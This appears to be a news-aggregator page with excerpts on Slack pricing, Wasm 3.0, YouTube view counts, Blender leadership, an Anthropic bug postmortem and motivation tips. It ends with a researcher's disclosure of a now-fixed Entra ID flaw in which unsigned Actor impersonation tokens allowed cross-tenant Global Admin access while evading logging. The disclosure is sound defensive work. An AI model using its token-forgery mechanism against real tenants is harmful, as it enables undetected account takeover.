10 interesting stories served every morning and every evening.
Slack is extorting us with a $195k/yr bill increase An open letter, or something
For nearly 11 years, Hack Club - a nonprofit that provides coding education and community to teenagers worldwide - has used Slack as the tool for communication. We weren’t freeloaders. A few years ago, when Slack transitioned us from their free nonprofit plan to a $5,000/year arrangement, we happily paid. It was reasonable, and we valued the service they provided to our community.
However, two days ago, Slack reached out to us and said that if we don’t agree to pay an extra $50k this week and $200k a year, they’ll deactivate our Slack workspace and delete all of our message history.
One could argue that Slack is free to stop providing us the nonprofit offer at any time, but in my opinion, a six month grace period is the bare minimum for a massive hike like this, if not more. Essentially, Salesforce (a $230 billion company) is strong-arming a small nonprofit for teens, by providing less than a week to pony up a pretty massive sum of money, or risk cutting off all our communications. That’s absurd.
The small amount of notice has also been catastrophic for the programs that we run. Dozens of our staff and volunteers are now scrambling to update systems, rebuild integrations and migrate years of institutional knowledge. The opportunity cost of this forced migration is simply staggering.
Anyway, we’re moving to Mattermost. This experience has taught us that owning your data is incredibly important, and if you’re a small business especially, then I’d advise you move away too.
This post was rushed out because, well, this has been a shock! If you’d like any additional details then feel free to send me an email.
...
Read the original on skyfall.dev »
Three years ago, version 2.0 of the Wasm standard was (essentially) finished, which brought a number of new features, such as vector instructions, bulk memory operations, multiple return values, and simple reference types.
In the meantime, the Wasm W3C Community Group and Working Group have not been lazy. Today, we are happy to announce the release of Wasm 3.0 as the new “live” standard.
This is a substantially larger update: several big features, some of which have been in the making for six or eight years, finally made it over the finishing line.
64-bit address space. Memories and tables can now be declared to use i64 as their address type instead of just i32. That expands the available address space of Wasm applications from 4 gigabytes to (theoretically) 16 exabytes, to the extent that physical hardware allows. While the web will necessarily keep enforcing certain limits — on the web, a 64-bit memory is limited to 16 gigabytes — the new flexibility is especially interesting for non-web ecosystems using Wasm, as they can support much, much larger applications and data sets now.
Multiple memories. Contrary to popular belief, Wasm applications were always able to use multiple memory objects — and hence multiple address spaces — simultaneously. However, previously that was only possible by declaring and accessing each of them in separate modules. This gap has been closed, a single module can now declare (define or import) multiple memories and directly access them, including directly copying data between them. This finally allows tools like wasm-merge, which perform “static linking” on two or more Wasm modules by merging them into one, to work for all Wasm modules. It also paves the way for new uses of separate address spaces, e.g., for security (separating private data), for buffering, or for instrumentation.
Garbage collection. In addition to expanding the capabilities of raw linear memories, Wasm also adds support for a new (and separate) form of storage that is automatically managed by the Wasm runtime via a garbage collector. Staying true to the spirit of Wasm as a low-level language, Wasm GC is low-level as well: a compiler targeting Wasm can declare the memory layout of its runtime data structures in terms of struct and array types, plus unboxed tagged integers, whose allocation and lifetime is then handled by Wasm. But that’s it. Everything else, such as engineering suitable representations for source-language values, including implementation details like method tables, remains the responsibility of compilers targeting Wasm. There are no built-in object systems, nor closures or other higher-level constructs — which would inevitably be heavily biased towards specific languages. Instead, Wasm only provides the basic building blocks for representing such constructs and focuses purely on the memory management aspect.
Typed references. The GC extension is built upon a substantial extension to the Wasm type system, which now supports much richer forms of references. Reference types can now describe the exact shape of the referenced heap value, avoiding additional runtime checks that would otherwise be needed to ensure safety. This more expressive typing mechanism, including subtyping and type recursion, is also available for function references, making it possible to perform safe indirect function calls without any runtime type or bounds check, through the new call_ref instruction.
Tail calls. Tail calls are a variant of function calls that immediately exit the current function, and thereby avoid taking up additional stack space. Tail calls are an important mechanism that is used in various language implementations both in user-visible ways (e.g., in functional languages) and for internal techniques (e.g., to implement stubs). Wasm tail calls are fully general and work for callees both selected statically (by function index) and dynamically (by reference or table).
Exception handling. Exceptions provide a way to locally abort execution, and are a common feature in modern programming languages. Previously, there was no efficient way to compile exception handling to Wasm, and existing compilers typically resorted to convoluted ways of implementing them by escaping to the host language, e.g., JavaScript. This was neither portable nor efficient. Wasm 3.0 hence provides native exception handling within Wasm. Exceptions are defined by declaring exception tags with associated payload data. As one would expect, an exception can be thrown, and selectively be caught by a surrounding handler, based on its tag. Exception handlers are a new form of block instruction that includes a dispatch list of tag/label pairs or catch-all labels to define where to jump when an exception occurs.
Relaxed vector instructions. Wasm 2.0 added a large set of vector (SIMD) instructions, but due to differences in hardware, some of these instructions have to do extra work on some platforms to achieve the specified semantics. In order to squeeze out maximum performance, Wasm 3.0 introduces “relaxed” variants of these instructions that are allowed to have implementation-dependent behavior in certain edge cases. This behavior must be selected from a pre-specified set of legal choices.
Deterministic profile. To make up for the added semantic fuzziness of relaxed vector instructions, and in order to support settings that demand or need deterministic execution semantics (such as blockchains, or replayable systems), the Wasm standard now specifies a deterministic default behavior for every instruction with otherwise non-deterministic results — currently, this includes floating-point operators and their generated NaN values and the aforementioned relaxed vector instructions. Between platforms choosing to implement this deterministic execution profile, Wasm thereby is fully deterministic, reproducible, and portable.
Custom annotation syntax. Finally, the Wasm text format has been enriched with generic syntax for placing annotations in Wasm source code. Analogous to custom sections in the binary format, these annotations are not assigned any meaning by the Wasm standard itself, and can be chosen to be ignored by implementations. However, they provide a way to represent the information stored in custom sections in human-readable and writable form, and concrete annotations can be specified by downstream standards.
In addition to these core features, embeddings of Wasm into JavaScript benefit from a new extension to the JS API:
JS string builtins. JavaScript string values can already be passed to Wasm as externrefs. Functions from this new primitive library can be imported into a Wasm module to directly access and manipulate such external string values inside Wasm.
With these new features, Wasm has much better support for compiling high-level programming languages. Enabled by this, we have seen various new languages popping up to target Wasm, such as Java, OCaml, Scala, Kotlin, Scheme, or Dart, all of which use the new GC feature.
On top of all these goodies, Wasm 3.0 also is the first version of the standard that has been produced with the new SpecTec tool chain. We believe that this makes for an even more reliable specification.
Wasm 3.0 is already shipping in most major web browsers, and support in stand-alone engines like Wasmtime is on track to completion as well. The Wasm feature status page tracks support across engines.
...
Read the original on webassembly.org »
...
Read the original on www.meta.com »
...
Read the original on www.meta.com »
Over the past month or so, many YouTubers have been reporting major drops to their video view counts. Theories have run wild, but there’s one explanation involving ad blockers that makes the most sense, but YouTube isn’t confirming anything directly.
Since mid-August, many YouTubers have noticed their view counts are considerably lower than they were before, in some cases with very drastic drops. The reason for the drop, though, has been shrouded in mystery for many creators.
The most likely explanation seems to be that YouTube is not counting views properly for users with an ad blocker enabled, another step in the platform’s continued war on ad blockers. This was first realized by Josh Strife Hayes, who noticed that view counts on TV, phones, and tablets have been steady, while views on computers have dropped by around 50% since the mid-August trend started. TechLinked, a channel in the Linus Tech Tips family, confirmed similar numbers within its statistics.
This aligns with one of the possible explanations that YouTube itself hinted at in an acknowledgement of lower view counts.
Viewers Using Ad Blockers & Other Content Blocking Tools: Ad blockers and other extensions can impact the accuracy of reported view counts. Channels whose audiences include a higher proportion of users utilizing such tools may see more fluctuations in traffic related to updates to these tools.
The rest of the post addresses prior speculation that YouTube’s new AI-powered age verification tools were to blame — which YouTube adamantly says is not the case — while also offering other possible explanations such as “seasonal viewing habits” and competition on the platform.
YouTube says “there is no systemic issue that is impacting creators” regarding lower view counts.
This ad blocker situation does seem the most likely explanation, though. In a prior video, Linus Tech Tips had noted that while view counts were down, ad revenue was not. If computer views are the only ones down, it stands to reason that viewers using an ad blocker are not being counted correctly, especially if ad revenue isn’t taking a hit from the lower view counts. YouTube’s hint that ad blockers “can impact the accuracy of reported view counts” certainly suggests this is possible, even if it’s not firm confirmation.
...
Read the original on 9to5google.com »
...
Read the original on unscreenshottable.vercel.app »
The keynote from this week’s Blender Conference, during which Ton Roosendaal — the original creator of the open-source 3D software — announced that he is standing down as Blender CEO.
Ton Roosendaal is to step down as chairman of the Blender Foundation and Blender CEO on 1 January 2026. The news was announced during today’s keynote at the Blender Conference.
Roosendaal — the original author of the open-source 3D software, and its public figurehead for the past three decades — will pass on his roles to current Blender COO Francesco Siddi.
Roosendaal himself will move to the newly established Blender Foundation supervisory board.
Other new Blender Foundation board positions include Head of Development Sergey Sharybin, Head of Product Dalai Felinto, and Head of Operations Fiona Cohen.
Ton Roosendaal in the early 1990s. Blender originated as in-house software at NeoGeo, the animation studio he co-founded.
Blender’s original creator and principal promoter
Blender began life in the mid-1990s as in-house software at NeoGeo, the Dutch animation studio that Roosendaal co-founded, and for which he wrote the custom tools.
Although initially set to become a commercial product, when investors decided to pull the plug on Not a Number, the firm he had founded to develop Blender, Roosendaal went open-source.
A crowdfunding campaign quickly raised the €110,000 needed to buy back the code base, and on 13 October 2002, Blender was released to the world under a GPL licence.
From the start, two things distinguished Blender from most other open-source CG applications.
First, even before the first release, Roosendaal established the non-profit Blender Foundation, so development was run through an organization akin to a commercial software developer.
Second, the software was tested in something close to real-world production conditions, on a series of ‘open movies’, beginning with 2006’s Elephants Dream, and continuing to this day.
The early open movies — funded through a combination of DVD pre-sales and arts grants — also provided valuable exposure for Blender, and illustrated Roosendaal’s gifts as a producer and promoter: a mixture of passion, physical presence, and sheer force of personality.
Taking Blender from fan favorite to staple of professional production
By the mid-2010s, Blender was quietly being adopted in major studios, with Pixar confirming that it was one of a small number of third-party 3D tools that it approved for use internally.
A major turning point was the release of Blender 2.80: the 2019 update that addressed many of the UI and workflow issues that had previously alienated artists used to commercial 3D apps.
It catalysed support for Blender among big tech firms, with a landmark $1.2 million grant from Epic Games followed by backing from companies including AMD, Intel, NVIDIA and Qualcomm.
Last year, the Corporate Patrons of the Blender Development Fund accounted for just under 40% of the collective income of the Blender organizations.
The resulting €3.1 million paid the salaries of over 15 full-time developers, plus a similar number of tech support staff and part-time devs: a larger team than many commercial CG tools.
Roosendaal (right) introduces the new Blender leadership team: (L-R) incoming CEO Francesco Siddi, Sergey Sharybin, Dalai Felinto and Fiona Cohen.
The public ‘incarnation of Blender’
During that time, the software has been closely identified with Roosendaal himself, both through his role as chairman of the Blender Foundation, and as a kind of totemic figurehead.
When I interviewed him in 2019 for an article in a UK tech magazine, he described himself, quite accurately, as “the incarnation of Blender”.
But in the same interview, he noted that “Blender is much bigger than me” and commented: “Now I need to get the organisation working without me, and then I can move on.”
Six years later, those plans have finally come to fruition, with the appointment of a new Blender leadership team.
From single figurehead to four core leadership roles
Announcing his departure at the Blender Conference, Roosendaal identified four of his key skills that he felt had led to Blender’s success: as an organizer, developer, designer and entrepreneur.
It’s telling that rather than trying to appoint one person to fulfil all four roles, they have been split out to four separate people.
Former animation producer Fiona Cohen takes on the organizational role, as the Blender Foundation’s new Head of Operations.
The developer role will be taken by Blender Lead Engineer Sergey Sharybin in his new role as the Foundation’s Head of Development.
The designer role passes to another long-time Blender artist and developer, Dalai Felinto, as the new Head of Product.
The critical entrepreneurial role will be fulfilled by current Blender COO Francesco Siddi, who takes on Roosendaal’s job tiles of chairman and CEO.
Siddi first began working with the Blender organization in 2012, as a VFX artist on the open movie Tears of Steel, later acting as a web developer and pipeline developer.
He began working as a producer on subsequent open movies in 2017, and has managed Blender’s industry relations since 2020.
“I am very proud to have such a wonderfully talented young team around me to bring our free and open source project into the next decade,” commented Roosendaal.
Read the official announcement that Ton Roosendaal is stepping down as Blender CEO
Read more about Blender’s leadership structure in the latest Blender Foundation annual report
...
Read the original on www.cgchannel.com »
Between August and early September, three infrastructure bugs intermittently degraded Claude’s response quality. We’ve now resolved these issues and want to explain what happened.
In early August, a number of users began reporting degraded responses from Claude. These initial reports were difficult to distinguish from normal variation in user feedback. By late August, the increasing frequency and persistence of these reports prompted us to open an investigation that led us to uncover three separate infrastructure bugs.
To state it plainly: We never reduce model quality due to demand, time of day, or server load. The problems our users reported were due to infrastructure bugs alone.
We recognize users expect consistent quality from Claude, and we maintain an extremely high bar for ensuring infrastructure changes don’t affect model outputs. In these recent incidents, we didn’t meet that bar. The following postmortem explains what went wrong, why detection and resolution took longer than we would have wanted, and what we’re changing to prevent similar future incidents.
We don’t typically share this level of technical detail about our infrastructure, but the scope and complexity of these issues justified a more comprehensive explanation.
We serve Claude to millions of users via our first-party API, Amazon Bedrock, and Google Cloud’s Vertex AI. We deploy Claude across multiple hardware platforms, namely AWS Trainium, NVIDIA GPUs, and Google TPUs. This approach provides the capacity and geographic distribution necessary to serve users worldwide.
Each hardware platform has different characteristics and requires specific optimizations. Despite these variations, we have strict equivalence standards for model implementations. Our aim is that users should get the same quality responses regardless of which platform serves their request. This complexity means that any infrastructure change requires careful validation across all platforms and configurations.
The overlapping nature of these bugs made diagnosis particularly challenging. The first bug was introduced on August 5, affecting approximately 0.8% of requests made to Sonnet 4. Two more bugs arose from deployments on August 25 and 26.
Although initial impacts were limited, a load balancing change on August 29 started to increase affected traffic. This caused many more users to experience issues while others continued to see normal performance, creating confusing and contradictory reports.
Below we describe the three bugs that caused the degradation, when they occurred, and how we resolved them:
On August 5, some Sonnet 4 requests were misrouted to servers configured for the upcoming 1M token context window. This bug initially affected 0.8% of requests. On August 29, a routine load balancing change unintentionally increased the number of short-context requests routed to the 1M context servers. At the worst impacted hour on August 31, 16% of Sonnet 4 requests were affected.
Approximately 30% of Claude Code users who made requests during this period had at least one message routed to the wrong server type, resulting in degraded responses. On Amazon Bedrock, misrouted traffic peaked at 0.18% of all Sonnet 4 requests from August 12. Incorrect routing affected less than 0.0004% of requests on Google Cloud’s Vertex AI between August 27 and September 16.
However, some users were affected more severely, as our routing is “sticky”. This meant that once a request was served by the incorrect server, subsequent follow-ups were likely to be served by the same incorrect server.
Resolution: We fixed the routing logic to ensure short- and long-context requests were directed to the correct server pools. We deployed the fix on September 4. A rollout to our first-party platforms and Google Cloud’s Vertex was completed by September 16. The fix is in the process of being rolled out on Bedrock.
On August 25, we deployed a misconfiguration to the Claude API TPU servers that caused an error during token generation. An issue caused by a runtime performance optimization occasionally assigned a high probability to tokens that should rarely be produced given the context, for example producing Thai or Chinese characters in response to English prompts, or producing obvious syntax errors in code. A small subset of users that asked a question in English might have seen “สวัสดี” in the middle of the response, for example.
This corruption affected requests made to Opus 4.1 and Opus 4 on August 25-28, and requests to Sonnet 4 August 25–September 2. Third-party platforms were not affected by this issue.
Resolution: We identified the issue and rolled back the change on September 2. We’ve added detection tests for unexpected character outputs to our deployment process.
On August 25, we deployed code to improve how Claude selects tokens during text generation. This change inadvertently triggered a latent bug in the XLA:TPU[1] compiler, which has been confirmed to affect requests to Claude Haiku 3.5.
We also believe this could have impacted a subset of Sonnet 4 and Opus 3 on the Claude API. Third-party platforms were not affected by this issue.
Resolution: We first observed the bug affecting Haiku 3.5 and rolled it back on September 4. We later noticed user reports of problems with Opus 3 that were compatible with this bug, and rolled it back on September 12. After extensive investigation we were unable to reproduce this bug on Sonnet 4 but decided to also roll it back out of an abundance of caution.
Simultaneously, we have (a) been working with the XLA:TPU team on a fix for the compiler bug and (b) rolled out a fix to use exact top-k with enhanced precision. For details, see the deep dive below.
To illustrate the complexity of these issues, here’s how the XLA compiler bug manifested and why it proved particularly challenging to diagnose.
When Claude generates text, it calculates probabilities for each possible next word, then randomly chooses a sample from this probability distribution. We use “top-p sampling” to avoid nonsensical outputs—only considering words whose cumulative probability reaches a threshold (typically 0.99 or 0.999). On TPUs, our models run across multiple chips, with probability calculations happening in different locations. To sort these probabilities, we need to coordinate data between chips, which is complex.[2]
In December 2024, we discovered our TPU implementation would occasionally drop the most probable token when temperature was zero. We deployed a workaround to fix this case.
The root cause involved mixed precision arithmetic. Our models compute next-token probabilities in bf16 (16-bit floating point). However, the vector processor is fp32-native, so the TPU compiler (XLA) can optimize runtime by converting some operations to fp32 (32-bit). This optimization pass is guarded by the xla_allow_excess_precision flag which defaults to true.
This caused a mismatch: operations that should have agreed on the highest probability token were running at different precision levels. The precision mismatch meant they didn’t agree on which token had the highest probability. This caused the highest probability token to sometimes disappear from consideration entirely.
On August 26, we deployed a rewrite of our sampling code to fix the precision issues and improve how we handled probabilities at the limit that reach the top-p threshold. But in fixing these problems, we exposed a trickier one.
Our fix removed the December workaround because we believed we’d solved the root cause. This led to a deeper bug in the approximate top-k operation—a performance optimization that quickly finds the highest probability tokens.[3] This approximation sometimes returned completely wrong results, but only for certain batch sizes and model configurations. The December workaround had been inadvertently masking this problem.
The bug’s behavior was frustratingly inconsistent. It changed depending on unrelated factors such as what operations ran before or after it, and whether debugging tools were enabled. The same prompt might work perfectly on one request and fail on the next.
While investigating, we also discovered that the exact top-k operation no longer had the prohibitive performance penalty it once did. We switched from approximate to exact top-k and standardized some additional operations on fp32 precision.[4] Model quality is non-negotiable, so we accepted the minor efficiency impact.
Our validation process ordinarily relies on benchmarks alongside safety evaluations and performance metrics. Engineering teams perform spot checks and deploy to small “canary” groups first.
These issues exposed critical gaps that we should have identified earlier. The evaluations we ran simply didn’t capture the degradation users were reporting, in part because Claude often recovers well from isolated mistakes. Our own privacy practices also created challenges in investigating reports. Our internal privacy and security controls limit how and when engineers can access user interactions with Claude, in particular when those interactions are not reported to us as feedback. This protects user privacy but prevents engineers from examining the problematic interactions needed to identify or reproduce bugs.
Each bug produced different symptoms on different platforms at different rates. This created a confusing mix of reports that didn’t point to any single cause. It looked like random, inconsistent degradation.
More fundamentally, we relied too heavily on noisy evaluations. Although we were aware of an increase in reports online, we lacked a clear way to connect these to each of our recent changes. When negative reports spiked on August 29, we didn’t immediately make the connection to an otherwise standard load balancing change.
As we continue to improve our infrastructure, we’re also improving the way we evaluate and prevent bugs like those discussed above across all platforms where we serve Claude. Here’s what we’re changing:
* More sensitive evaluations: To help discover the root cause of any given issue, we’ve developed evaluations that can more reliably differentiate between working and broken implementations. We’ll keep improving these evaluations to keep a closer eye on model quality.
* Quality evaluations in more places: Although we run regular evaluations on our systems, we will run them continuously on true production systems to catch issues such as the context window load balancing error.
* Faster debugging tooling: We’ll develop infrastructure and tooling to better debug community-sourced feedback without sacrificing user privacy. Additionally, some bespoke tools developed here will be used to reduce the remediation time in future similar incidents, if those should occur.
Evals and monitoring are important. But these incidents have shown that we also need continuous signal from users when responses from Claude aren’t up to the usual standard. Reports of specific changes observed, examples of unexpected behavior encountered, and patterns across different use cases all helped us isolate the issues.
It remains particularly helpful for users to continue to send us their feedback directly. You can use the /bug command in Claude Code or you can use the “thumbs down” button in the Claude apps to do so. Developers and researchers often create new and interesting ways to evaluate model quality that complement our internal testing. If you’d like to share yours, reach out to feedback@anthropic.com.
We remain grateful to our community for these contributions.
...
Read the original on www.anthropic.com »
We have an air bike in our basement. If you are unfamiliar with air bikes, they are similar to stationary bikes with foot pedals but also have handles you push and pull with your arms. It uses air resistance, so the harder you pedal and move your arms, the higher the resistance.
It’s also known as an assault bike. 😬
Which is apt, because it’s a butt-kicker of a workout. I use it about once a week, more frequently in the winter when it’s too cold to run, and less often in the summer when I can get outside more. And I kind of hate it!
Before I even drag myself to our basement, I’m already dreading it. The only way I can convince myself to do it is by finding a suitably engaging show I can distract myself with on my phone while I huff and puff.
Every time, I start my warm-up and think to myself,
“It’s only 30 minutes, I can do this!”
Like clockwork, within the first three minutes, I think, “Maybe I will only do ten minutes today and do some pilates or weights instead.”
After ten minutes, I think, “OK, surely I can make it to 20 minutes, and that will be enough”.
After 20 minutes, as I gasp for air and sweat soaks through my shirt, I think “Well, I already made it to 20 minutes… I guess I will just finish it.”
And then I proceed to huff and puff to the end, wherein I walk my wobbly legs back up the stairs to do a cooldown. At which point I think, “That suuuuuucked…” And then congratulate myself on finishing as I try to get my heart rate back to normal. 🥵
This mental dance happens, without fail, every single time I ride.
I share this anecdote because it illustrates how tricky motivation can be, especially when faced with something you don’t want to do or have been procrastinating on. There are any number of things you have to deal with in your life that you don’t want to. There are even things you might generally enjoy that feel like they are hanging over you.
The pattern often goes like this:
* Before you start, it feels daunting, and the prospect lingers in the back of your mind. You know it needs to be done, but you really, really don’t feel like it. You leave it until it starts to loom larger and larger.
* When you finally convince yourself to start, it’s not what you want to be doing, but it’s generally fine. It’s often not even as bad as you thought it would be, and it feels good to make progress.
* As you near the end, you can even push yourself a little to wrap it up and get it off your plate.
* When it’s over, you feel relieved, like a weight has been taken off your shoulders, and you are both pleased with yourself and a little annoyed that it took you so long to deal with.
Motivation is a topic that comes up with nearly all my clients, as they navigate the various complexities of their lives. In some ways, motivation seems simple. You ask yourself, “Why can’t I just make myself be motivated to do the thing?”, whatever the thing might be. However, as you beat yourself up about it, consider that many factors influence our decision-making and the feeling of being motivated.
Humans are complex creatures, with numerous brain chemicals and hormones influencing our overall physical and emotional state, which themselves are constantly impacted, sometimes drastically, by things like:
* Have you been sleeping well and enough?
* Have you been eating well and the right amount for you?
* Have you been imbibing in alcohol or other things?
* Have you been moving your body regularly?
* Do you have any physical or mental conditions?
* Are you in pain?
* Do you have significant life stressors at this time?
* What time of day is it?
* Where are you in your natural hormone cycles?
* How old are you?
* Have you had any conflicts in your life recently?
* Did you move your body in a way entirely within your usual routines, but apparently in a way that is no longer acceptable?
* Did you sleep in a slightly different position than usual, and now your back will never be the same again?
I could go on, but you get the idea.😅
All of these factors (and more) conspire to shift your mood, physical energy, and mental energy, often making it harder to muster the motivation to do things. What, then, can you do to move things in the right direction? How do you motivate yourself to do a thing you don’t want to do?
Here are several ways to help encourage action when you feel unmotivated.
There are many external and internal factors, as listed above, that contribute to motivation.
* When your body isn’t feeling good, it’s harder to make it do things.
* When your mind is tired, distracted, or overwhelmed, it’s challenging to focus and accomplish tasks.
* When the thing you need to do isn’t important to you or something you don’t like, it’s hard to make yourself do it.
When you know why you aren’t motivated, you can think about what you could change to make things easier on yourself. What factors do you have control over?
* Environment - Is there a place you can go or a thing you can add that will make it feel easier? For example, I have my writing desk set up in a quiet corner of my bedroom (not the office I share with my husband) to help make writing easier, even when I am not feeling it.
* Mood - Is there something that will help boost your mood? Go for a ten-minute walk, treat yourself to a donut, text your best friend for a pep talk, turn on your favourite tunes… anything that will give you a little pick-me-up.
* Body - Are there things you can do to take care of your body to make it feel better? Try some stretching, take a nap, meditate, read a book, get some fresh air, go for a run, eat a comfort meal, or do anything that will help your body feel less stressed.
* Negative or fear motivators - Is the thing you are not motivated to do being motivated by negative or fear motivators? These include things like fear of judgment, fear of conflict, shame, guilt, or obligation. These motivators only go so far and deserve further examination to determine their place in your priorities. Maybe they aren’t things you need to do in the first place.
The key point here is to identify where you have control and where you don’t, and then do your best to adapt your circumstances to make it easier to take action.
When you think about the various activities and tasks you do each day, what is it that encourages you to do them? Some of those things will be negative motivators, as I mentioned above, but others will be things you do for fun, because they are interesting or rewarding. These are some tactics to consider for things that might help motivate you:
You know what makes cleaning out the garage a lot better? Some good tunes. Throw on an audiobook while you cook dinner. Watch a good show while you huff and puff on the air bike! Think about the things you enjoy and consider how you can combine them with the thing you’re trying to motivate yourself to do.
Sometimes it can be challenging to push yourself to do something when there are no external motivators. Ask a friend to be your accountability buddy, or hire a professional to help you stay accountable for the thing you’re trying to do, such as a coach, trainer, teacher, or dietitian. I know that one of the significant value-added benefits my clients get from working with me for a few months is having someone they have to report back to on their progress!
Is there any way to turn the process or thing you are unmotivated to do into a game? Can you add rewards if you do a certain amount, or set a goal for how many days you make progress in a row? For example, one of my motivators for doing some kind of fitness every day is keeping up my streak! 2817 days in a row as of publishing. 😁
Beyond small planned rewards, having something to look forward to as you make progress on your task or activity can also help encourage you to continue moving forward. Maybe you take a day off, order your favourite takeout, or simply share it with someone you care about.
For more specifics on types of motivation, read my article, What Motivates You? Learn the Types of Motivation and How to Use Them, where I get into more detail about intrinsic and extrinsic motivation.
If part of why you feel unmotivated is that what you need to do feels big and overwhelming, often the best thing you can do is try to break it down into smaller, more manageable pieces. What is the smallest amount you can do to make a bit of progress?
* Commit to spending 5 minutes on it
* Choose a small corner of a room you need to clean
* Write the text, even if you don’t send it
* Plan in your calendar when you will do it, so you don’t have it sitting in the back of your mind
* Talk about it with your partner or a friend
* Switch tasks to take a break and come back to it
Often, getting over the hump of starting something is enough to help push you through it. Even if it isn’t, at the very least, you have made some amount of progress, which you can build on.
If the thing you need to do is something you need to do regularly, like writing, fitness, practicing an instrument, or cleaning, you can’t rely purely on motivation to drive you. Even for things you enjoy, it’s easy to push something off “until you feel like it”. But with so many factors affecting your mood and energy, the times when you feel like it will be fleeting. Instead of relying on motivation, try to establish a routine that fosters consistency.
* Plan your intentional week so you have an idea of when you intend to do it
* Book it in your calendar
* Set a certain amount of time you will put aside each day or week to chip away at it
A little bit, consistently, will go a long way.
Sometimes, when you are not feeling motivated to do something, it’s reasonable to just put it on the back burner. Maybe it’s just not a priority right now, and that’s totally fine! Ask yourself, is this a glass ball or a plastic ball? If it’s plastic, set it aside for a bit and focus your time and energy on other things.
It’s ok to decide now is not the right time, but make it an intentional decision instead of something you avoid and feel bad about!
If you’re struggling with motivation, you’re not alone! It’s normal, it’s natural, and there are tons of different, ever-changing factors that will change how you feel. Do your best to examine where you are at, control what you can control, and make progress where you can!
Need some help getting motivated? Get in touch!
...
Read the original on ashleyjanssen.com »
Hacker, red teamer, researcher. Likes to write infosec-focussed Python tools. This is my personal blog containing research on topics I find interesting, such as (Azure) Active Directory internals, protocols and vulnerabilities.
Looking for a security test or training? Business contact via outsidersecurity.nl
One Token to rule them all - obtaining Global Admin in every Entra ID tenant via Actor tokens
While preparing for my Black Hat and DEF CON talks in July of this year, I found the most impactful Entra ID vulnerability that I will probably ever find. This vulnerability could have allowed me to compromise every Entra ID tenant in the world (except probably those in national cloud deployments). If you are an Entra ID admin reading this, yes that means complete access to your tenant. The vulnerability consisted of two components: undocumented impersonation tokens, called “Actor tokens”, that Microsoft uses in their backend for service-to-service (S2S) communication. Additionally, there was a critical flaw in the (legacy) Azure AD Graph API that failed to properly validate the originating tenant, allowing these tokens to be used for cross-tenant access.
Effectively this means that with a token I requested in my lab tenant I could authenticate as any user, including Global Admins, in any other tenant. Because of the nature of these Actor tokens, they are not subject to security policies like Conditional Access, which means there was no setting that could have mitigated this for specific hardened tenants. Since the Azure AD Graph API is an older API for managing the core Azure AD / Entra ID service, access to this API could have been used to make any modification in the tenant that Global Admins can do, including taking over or creating new identities and granting them any permission in the tenant. With these compromised identities the access could also be extended to Microsoft 365 and Azure.
I reported this vulnerability the same day to the Microsoft Security Response Center (MSRC). Microsoft fixed this vulnerability on their side within days of the report being submitted and has rolled out further mitigations that block applications from requesting these Actor tokens for the Azure AD Graph API. Microsoft also issued CVE-2025-55241 for this vulnerability.
These tokens allowed full access to the Azure AD Graph API in any tenant. Requesting Actor tokens does not generate logs. Even if it did they would be generated in my tenant instead of in the victim tenant, which means there is no record of the existence of these tokens.
Furthermore, the Azure AD Graph API does not have API level logging. Its successor, the Microsoft Graph, does have this logging, but for the Azure AD Graph this telemetry source is still in a very limited preview and I’m not aware of any tenant that currently has this available. Since there is no API level logging, it means the following Entra ID data could be accessed without any traces:
User information including all their personal details stored in Entra ID.
This information could be accessed by impersonating a regular user in the victim tenant. If you want to know the full impact, my tool roadrecon uses the same API, if you run it then everything you find in the GUI of the tool could have been accessed and modified by an attacker abusing this flaw.
If a Global Admin was impersonated, it would also be possible to modify any of the above objects and settings. This would result in full tenant compromise with access to any service that uses Entra ID for authentication, such as SharePoint Online and Exchange Online. It would also provide full access to any resource hosted in Azure, since these resources are controlled from the tenant level and Global Admins can grant themselves rights on Azure subscriptions. Modifying objects in the tenant does (usually) result in audit logs being generated. That means that while theoretically all data in Microsoft 365 could have been compromised, doing anything other than reading the directory information would leave audit logs that could alert defenders, though without knowledge of the specific artifacts that modifications with these Actor tokens generate, it would appear as if a legitimate Global Admin performed the actions.
Based on Microsoft’s internal telemetry, they did not detect any abuse of this vulnerability. If you want to search for possible abuse artifacts in your own environment, a KQL detection is included at the end of this post.
Actor tokens are tokens that are issued by the “Access Control Service”. I don’t know the exact origins of this service, but it appears to be a legacy service that is used for authentication with SharePoint applications and also seems to be used by Microsoft internally. I came across this service while investigating hybrid Exchange setups. These hybrid setups used to provision a certificate credential on the Exchange Online Service Principal (SP) in the tenant, with which it can perform authentication. These hybrid attacks were the topic of some talks I did this summer, the slides are on the talks page. In this case the hybrid part is not relevant, as in my lab I could also have added a credential on the Exchange Online SP without the complete hybrid setup. Exchange is not the only app which can do this, but since I found this in Exchange we will keep talking about these tokens in the context of Exchange.
Exchange will request Actor tokens when it wants to communicate with other services on behalf of a user. The Actor token allows it to “act” as another user in the tenant when talking to Exchange Online, SharePoint and as it turns out the Azure AD Graph. The Actor token (a JSON Web Token / JWT) looks as follows when decoded:
There are a few fields here that differ from regular Entra ID access tokens:
The aud field contains the GUID of the Azure AD Graph API, as well as the URL graph.windows.net and the tenant it was issued to 6287f28f-4f7f-4322-9651-a8697d8fe1bc.
The expiry is exactly 24 hours after the token was issued.
The iss contains the GUID of the Entra ID token service itself, called “Azure ESTS Service”, and again the tenant GUID where it was issued.
The token contains the claim trustedfordelegation, which is True in this case, meaning we can use this token to impersonate other identities. Many Microsoft apps could request such tokens. Non-Microsoft apps requesting an Actor token would receive a token with this field set to False instead.
When using this Actor token, Exchange would embed this in an unsigned JWT that is then sent to the resource provider, in this case the Azure AD graph. In the rest of the blog I call these impersonation tokens since they are used to impersonate users.
The sip, smtp, upn fields are used when accessing resources in Exchange online or SharePoint, but are ignored when talking to the Azure AD Graph, which only cares about the nameid. This nameid originates from an attribute of the user that is called the netId on the Azure AD Graph. You will also see it reflected in tokens issued to users, in the puid claim, which stands for Passport UID. I believe these identifiers are an artifact from the original codebase which Microsoft used for its Microsoft Accounts (consumer accounts or MSA). They are still used in Entra ID, for example to map guest users to the original identity in their home tenant.
As I mentioned before, these impersonation tokens are not signed. That means that once Exchange has an Actor token, it can use the one Actor token to impersonate anyone against the target service it was requested for, for 24 hours. In my personal opinion, this whole Actor token design is something that never should have existed. It lacks almost every security control that you would want:
There are no logs when Actor tokens are issued.
Since these services can craft the unsigned impersonation tokens without talking to Entra ID, there are also no logs when they are created or used.
They cannot be revoked within their 24 hours validity.
They completely bypass any restrictions configured in Conditional Access.
We have to rely on logging from the resource provider to even know these tokens were used in the tenant.
